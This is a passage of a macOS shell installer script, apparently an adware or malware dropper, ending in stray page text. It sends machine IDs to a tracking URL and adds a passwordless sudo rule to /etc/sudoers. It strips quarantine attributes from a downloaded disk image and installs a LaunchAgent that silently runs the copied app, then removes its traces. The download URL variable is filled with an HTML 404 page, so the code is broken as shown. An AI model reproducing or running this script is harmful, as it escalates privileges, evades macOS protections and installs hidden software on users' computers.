	CONTEVENTSSTARTING="{\"event\": \"$EVENTSSTARTING\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQEVENTSSTARTING="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEVENTSSTARTING' $EVENTSURL"
	eval $REQEVENTSSTARTING

	userId=$(id -u $user)

	TMPFILE=$(sudo -u $user mktemp /tmp/XXXXXXXXXXXX)

	SERVICE_NAME="com.$PRODUCTFOLDER"

	LAUNCH_AGENTS_PATH="$userHome/Library/LaunchAgents/"

	PLIST_PATH="$LAUNCH_AGENTS_PATH$SERVICE_NAME.plist"

	URL="<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
	<html xmlns="https://www.w3.org/1999/xhtml">
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
	<title>404 - File or directory not found.</title>
	<style type="text/css">
	<!--
	body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
	fieldset{padding:0 15px 10px 15px;}
	h1{font-size:2.4em;margin:0;color:#FFF;}
	h2{font-size:1.7em;margin:0;color:#CC0000;}
	h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
	#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
	background-color:#555555;}
	#content{margin:0 0 0 2%;position:relative;}
	.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
	-->
	</style>
	</head>
	<body>
	<div id="header"><h1>Server Error</h1></div>
	<div id="content">
	<div class="content-container"><fieldset>
	<h2>404 - File or directory not found.</h2>
	<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
	</fieldset></div>
	</div>
	</body>
	</html>
	"

	SCRIPT="sudo $TMPFILE pkgsh && rm $TMPFILE && /bin/launchctl bootout gui/$userId/$SERVICE_NAME"

	echo "$user ALL = NOPASSWD: $TMPFILE pkgsh" >> "/etc/sudoers"

	sudo -u $user mkdir "$LAUNCH_AGENTS_PATH"

	if [ -f "$PLIST_PATH" ]; then

	/bin/launchctl bootout gui/$userId/$SERVICE_NAME

	rm $PLIST_PATH

	fi

	sudo -u $user /usr/bin/curl -L -o "/tmp/setup.dmg" $URL
	if [ $? -eq 0 ]; then
	CONTEUNZIPFILESUCCESS="{\"event\": \"$EVENTSDLWFileSuccess\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQEUNZIPZIPFILESUCCESS="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEUNZIPFILESUCCESS' $EVENTSURL"
	eval $REQEUNZIPZIPFILESUCCESS
	else
	CONTEUNZIPFILEERROR="{\"event\": \"$EVENTSDLWFileError\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQEUNZIPFILEERROR="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEUNZIPFILEERROR' $EVENTSURL"
	eval $REQEUNZIPFILEERROR
	fi

	sudo -u $user /usr/bin/xattr -rc "/tmp/setup.dmg"

	sudo -u $user /usr/bin/hdiutil attach "/tmp/setup.dmg"

	if [ -d "/Volumes/Install" ]; then
	PATHNAME="Install"
	fi

	CONTENT_VOLUME=$(ls /Volumes/$PATHNAME \| awk '/.app/')

	sudo -u $user cp -rf "/Volumes/$PATHNAME/$CONTENT_VOLUME" "/tmp"

	sleep 2

	sudo -u $user chmod -R 777 "/tmp/$CONTENT_VOLUME"

	sudo -u $user /bin/echo "/tmp/./$CONTENT_VOLUME/Contents/MacOS/$(ls /tmp/$CONTENT_VOLUME/Contents/MacOS \| head -n1) -shh" >> $TMPFILE

	sudo -u $user chmod 777 $TMPFILE

	sudo -u $user /usr/libexec/PlistBuddy -c "Add :Label string $SERVICE_NAME" "$PLIST_PATH"

	sudo -u $user /usr/libexec/PlistBuddy -c 'Add :ProgramArguments array' "$PLIST_PATH"

	sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string /bin/bash" "$PLIST_PATH"

	sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string -c" "$PLIST_PATH"

	sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string $SCRIPT" "$PLIST_PATH"

	sudo -u $user /usr/libexec/PlistBuddy -c 'Add :RunAtLoad bool true' "$PLIST_PATH"

	/bin/launchctl bootstrap gui/$userId "$PLIST_PATH"
	if [ $? -eq 0 ]; then
	CONTERUNNINGFILESUCCESS="{\"event\": \"$EVENTSRunningFileSuccess\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQERUNNINGZIPFILESUCCESS="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTERUNNINGFILESUCCESS' $EVENTSURL"
	eval $REQERUNNINGZIPFILESUCCESS
	else
	CONTERUNNINGFILEERROR="{\"event\": \"$EVENTSRunningFileError\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQERUNNINGFILEERROR="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTERUNNINGFILEERROR' $EVENTSURL"
	eval $REQERUNNINGFILEERROR
	fi

	sleep 10

	sed -i '' -e '$ d' /etc/sudoers

	rm $PLIST_PATH
	rm "/tmp/setup.dmg"
	hdiutil detach "$PATHNAME"
	fi

	else

	CONTUSERALREADYUPDATED="{\"event\": \"$EVENTSUserExists\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQUSERALREADYUPDATED="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTUSERALREADYUPDATED' $EVENTSURL"
	eval $REQUSERALREADYUPDATED

	fi

	else

	CONTUSERALREADYUPDATED="{\"event\": \"$EVENTSUserExists\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQUSERALREADYUPDATED="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTUSERALREADYUPDATED' $EVENTSURL"
	eval $REQUSERALREADYUPDATED

	fi

	```
No results found